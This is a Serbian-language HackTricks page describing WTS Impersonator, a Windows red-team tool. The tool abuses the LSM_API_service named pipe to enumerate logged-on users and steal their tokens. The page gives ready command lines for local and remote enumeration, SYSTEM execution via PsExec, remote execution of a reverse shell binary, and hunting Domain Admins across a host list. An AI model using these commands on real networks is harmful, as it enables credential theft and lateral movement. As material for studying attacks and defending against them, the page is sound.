mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 20:53:37 +00:00
4.4 KiB
4.4 KiB
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
Drugi načini podrške HackTricks-u:
- Ako želite da vidite vašu kompaniju reklamiranu na HackTricks-u ili preuzmete HackTricks u PDF formatu proverite SUBSCRIPTION PLANS!
- Nabavite zvanični PEASS & HackTricks swag
- Otkrijte The PEASS Family, našu kolekciju ekskluzivnih NFT-ova
- Pridružite se 💬 Discord grupi ili telegram grupi ili nas pratite na Twitter-u 🐦 @carlospolopm.
- Podelite svoje hakovanje trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
Alat WTS Impersonator iskorišćava "\pipe\LSM_API_service" RPC Imenovane cijevi da tajno nabroji prijavljene korisnike i preuzme njihove tokene, zaobilazeći tradicionalne tehnike impersonacije tokena. Ovaj pristup olakšava neprimetno lateralno kretanje unutar mreža. Inovacija iza ove tehnike pripada Omri Baso-u, čiji rad je dostupan na GitHub-u.
Osnovna funkcionalnost
Alat funkcioniše kroz niz API poziva:
WTSEnumerateSessionsA → WTSQuerySessionInformationA → WTSQueryUserToken → CreateProcessAsUserW
Ključni moduli i upotreba
- Nabrajanje korisnika: Alat omogućava lokalno i udaljeno nabrajanje korisnika, koristeći odgovarajuće komande za svaki scenario:
- Lokalno:
.\WTSImpersonator.exe -m enum
- Udaljeno, navođenjem IP adrese ili imena hosta:
.\WTSImpersonator.exe -m enum -s 192.168.40.131
- Izvršavanje komandi: Moduli
exec
iexec-remote
zahtevaju Service kontekst za funkcionisanje. Lokalno izvršavanje jednostavno zahteva izvršnu datoteku WTSImpersonator i komandu: - Primer za lokalno izvršavanje komande:
.\WTSImpersonator.exe -m exec -s 3 -c C:\Windows\System32\cmd.exe
- PsExec64.exe se može koristiti za dobijanje Service konteksta:
.\PsExec64.exe -accepteula -s cmd.exe
- Udaljeno izvršavanje komandi: Uključuje kreiranje i instaliranje servisa na daljinu, slično kao PsExec.exe, omogućavajući izvršavanje sa odgovarajućim dozvolama.
- Primer udaljenog izvršavanja:
.\WTSImpersonator.exe -m exec-remote -s 192.168.40.129 -c .\SimpleReverseShellExample.exe -sp .\WTSService.exe -id 2
- Modul za pronalaženje korisnika: Cilja određene korisnike na više mašina, izvršavajući kod pod njihovim akreditivima. Ovo je posebno korisno za ciljanje Domain Admins sa lokalnim administratorskim pravima na više sistema.
- Primer upotrebe:
.\WTSImpersonator.exe -m user-hunter -uh DOMAIN/USER -ipl .\IPsList.txt -c .\ExeToExecute.exe -sp .\WTServiceBinary.exe
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
Drugi načini podrške HackTricks-u:
- Ako želite da vidite vašu kompaniju reklamiranu na HackTricks-u ili preuzmete HackTricks u PDF formatu, proverite SUBSCRIPTION PLANS!
- Nabavite zvanični PEASS & HackTricks swag
- Otkrijte The PEASS Family, našu kolekciju ekskluzivnih NFT-ova
- Pridružite se 💬 Discord grupi ili telegram grupi ili nas pratite na Twitter-u 🐦 @carlospolopm.
- Podelite svoje hakovanje trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.